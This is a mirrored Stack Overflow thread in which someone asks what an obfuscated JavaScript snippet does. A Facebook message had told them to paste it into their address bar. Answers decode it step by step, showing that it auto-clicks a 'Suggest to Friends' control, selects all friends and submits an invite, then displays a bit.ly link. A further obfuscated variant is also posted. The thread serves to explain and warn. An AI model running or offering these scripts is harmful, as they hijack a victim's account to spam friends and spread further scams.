1. 技术文章
  2. Javascript in the address bar - is this malicious?

Javascript in the address bar - is this malicious?

落花浮王杯 提交于 2019-12-30 04:39:04

问题


I got a message on Facebook telling me to copy and paste this into my address bar. I thought I'd post it here and see what everyone thinks about it. What does it do? How does it work?

Here's the source code: 

// (DO NOT DO THIS!)
Javascript:var a=["\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x61\x70\x70\x34\x39\x34\x39\x37\x35\x32\x38\x37\x38\x5F\x61\x70\x70\x34\x39\x34\x39\x37\x35\x32\x38\x37\x38\x5F\x64\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x3C\x61\x20\x69\x64\x3D\x22\x73\x75\x67\x67\x65\x73\x74\x22\x20\x68\x72\x65\x66\x3D\x22\x23\x22\x20\x61\x6A\x61\x78\x69\x66\x79\x3D\x22\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70\x3F\x63\x6C\x61\x73\x73\x3D\x46\x61\x6E\x4D\x61\x6E\x61\x67\x65\x72\x26\x61\x6D\x70\x3B\x6E\x6F\x64\x65\x5F\x69\x64\x3D\x31\x31\x32\x36\x38\x32\x36\x39\x35\x34\x31\x38\x35\x32\x33\x22\x20\x63\x6C\x61\x73\x73\x3D\x22\x20\x70\x72\x6F\x66\x69\x6C\x65\x5F\x61\x63\x74\x69\x6F\x6E\x20\x61\x63\x74\x69\x6F\x6E\x73\x70\x72\x6F\x5F\x61\x22\x20\x72\x65\x6C\x3D\x22\x64\x69\x61\x6C\x6F\x67\x2D\x70\x6F\x73\x74\x22\x3E\x53\x75\x67\x67\x65\x73\x74\x20\x74\x6F\x20\x46\x72\x69\x65\x6E\x64\x73\x3C\x2F\x61\x3E","\x73\x75\x67\x67\x65\x73\x74","\x4D\x6F\x75\x73\x65\x45\x76\x65\x6E\x74\x73","\x63\x72\x65\x61\x74\x65\x45\x76\x65\x6E\x74","\x63\x6C\x69\x63\x6B","\x69\x6E\x69\x74\x45\x76\x65\x6E\x74","\x64\x69\x73\x70\x61\x74\x63\x68\x45\x76\x65\x6E\x74","\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C","\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D","\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70","\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67"];
void (document[a[2]](a[1])[a[0]]=a[3]);var ss=document[a[2]](a[4]);
var c=document[a[6]](a[5]);
c[a[8]](a[7],true,true);
void (ss[a[9]](c));
void (setTimeout(function (){fs[a[10]]();} ,4000));
void (setTimeout(function (){SocialGraphManager[a[13]](a[11],a[12]);} ,5000));
void (setTimeout(function (){
document[a[2]](a[1])[a[0]]="\x3C\x61\x20\x68\x72\x65\x66\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x62\x69\x74\x2E\x6C\x79\x2F\x62\x54\x6C\x30\x76\x6A\x27\x3E\x43\x6F\x6D\x70\x6C\x65\x74\x65\x64\x21\x20\x43\x6C\x69\x63\x6B\x20\x68\x65\x72\x65\x3C\x2F\x61\x3E";
} ,5400));

回答1:


Here is the formatted source:

var a = ["innerHTML", 
         "app4949752878_app4949752878_dd", 
         "getElementById", 
         "<a id=\"suggest\" href=\"#\" ajaxify=\"/ajax/social_graph/invite_dialog.php?class=FanManager&amp;node_id=112682695418523\" class=\" profile_action actionspro_a\" rel=\"dialog-post\">Suggest to Friends</a>",
         "suggest", 
         "MouseEvents", 
         "createEvent", 
         "click", 
         "initEvent", 
         "dispatchEvent", 
         "select_all", 
         "sgm_invite_form", 
         "/ajax/social_graph/invite_dialog.php", 
         "submitDialog"];

void (document[a[2]](a[1])[a[0]] = a[3]);
var ss = document[a[2]](a[4]);
var c = document[a[6]](a[5]);
c[a[8]](a[7], true, true);
void ss[a[9]](c);
void setTimeout(function () {fs[a[10]]();}, 4000);
void setTimeout(function () {SocialGraphManager[a[13]](a[11], a[12]);}, 5000);
void setTimeout(function () {document[a[2]](a[1])[a[0]] = "<a href='http://bit.ly/bTl0vj'>Completed! Click here</a>";}, 5400);

The a array holds all strings used by the code.
Here it is with the strings put back in place:

void (document.getElementById('app4949752878_app4949752878_dd').innerHTML =  "<a id=\"suggest\" href=\"#\" ajaxify=\"/ajax/social_graph/invite_dialog.php?class=FanManager&amp;node_id=112682695418523\" class=\" profile_action actionspro_a\" rel=\"dialog-post\">Suggest to Friends</a>");
var ss = document.getElementById("suggest");
var c = document.createEvent("MouseEvents");
c.initEvent("click", true, true);
void ss.dispatchEvent(c);
void setTimeout(function () {fs.select_all();}, 4000);
void setTimeout(function () {
    SocialGraphManager.submitDialog("sgm_invite_form", "/ajax/social_graph/invite_dialog.php");
}, 5000);
void setTimeout(function () {
    document.getElementById('app4949752878_app4949752878_dd').innerHTML = "<a href='http://bit.ly/bTl0vj'>Completed! Click here</a>";
}, 5400);

Finally, here it is with decent names and structure:

var messageElement = document.getElementById('app4949752878_app4949752878_dd');

messageElement.innerHTML = 
    "<a id=\"suggest\" href=\"#\" ajaxify=\"/ajax/social_graph/invite_dialog.php?class=FanManager&amp;node_id=112682695418523\" class=\" profile_action actionspro_a\" rel=\"dialog-post\">Suggest to Friends</a>";

var suggestLink = document.getElementById("suggest");
var mouseEvent = document.createEvent("MouseEvents");
mouseEvent.initEvent("click", true, true);
suggestLink.dispatchEvent(mouseEvent);


setTimeout(function () { fs.select_all(); }, 4000);
setTimeout(function () {
    SocialGraphManager.submitDialog("sgm_invite_form", "/ajax/social_graph/invite_dialog.php");
}, 5000);
setTimeout(function () {
    messageElement.innerHTML = "<a href='http://bit.ly/bTl0vj'>Completed! Click here</a>";
}, 5400);



回答2:


I always find this sort of thing interesting because it shows various ways people use to try and get around security or entice others to do something stupid.

My "Golden rule" is that things like this are always something very dodgy and best ignored. Nothing legit requires this sort of hacking, at the very least it probably contravenes some site policy. At the very worst you get hacked and your computer or online identity used and abused or your bank accounts drained.




回答3:


Very interesting. How did you go about decoding it though?

I got something like this just now, but it didn't look like the sametype of content. Part of the code (the latter half) is below. I didn't know if I should paste the entire code. Newbie here.

 (new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('J e=["\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A","\\j\\h\\A\\i\\f","\\o\\f\\h\\q\\i\\f\\r\\f\\k\\h\\K\\A\\L\\t","\\w\\g\\t\\t\\f\\k","\\g\\k\\k\\f\\x\\M\\N\\G\\O","\\n\\l\\i\\y\\f","\\j\\y\\o\\o\\f\\j\\h","\\i\\g\\H\\f\\r\\f","\\G\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j","\\p\\x\\f\\l\\h\\f\\q\\n\\f\\k\\h","\\p\\i\\g\\p\\H","\\g\\k\\g\\h\\q\\n\\f\\k\\h","\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h","\\j\\f\\i\\f\\p\\h\\v\\l\\i\\i","\\j\\o\\r\\v\\g\\k\\n\\g\\h\\f\\v\\P\\u\\x\\r","\\B\\l\\Q\\l\\R\\B\\j\\u\\p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z","\\j\\y\\F\\r\\g\\h\\T\\g\\l\\i\\u\\o"];d=U;d[e[2]](V)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);c=d[e[9]](e[8]);c[e[11]](e[10],I,I);s[e[12]](c);C(D(){W[e[13]]()},E);C(D(){X[e[16]](e[14],e[15])},E);C(D(){m[e[12]](c);d[e[2]](Y)[e[4]]=d[e[2]](Z)[e[5]]},E);',62,69,'||||||||||||||_0x95ea|x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|x6F|x5F|x68|x72|x75|x70|x79|x2F|setTimeout|function|5000|x62|x4D|x6B|true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44|document|mw|fs|SocialGraphManager|ifo|ifc|||||||'.split('|'),0,{}))})();


来源:https://stackoverflow.com/questions/2634159/javascript-in-the-address-bar-is-this-malicious

标签
javascript
security
易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!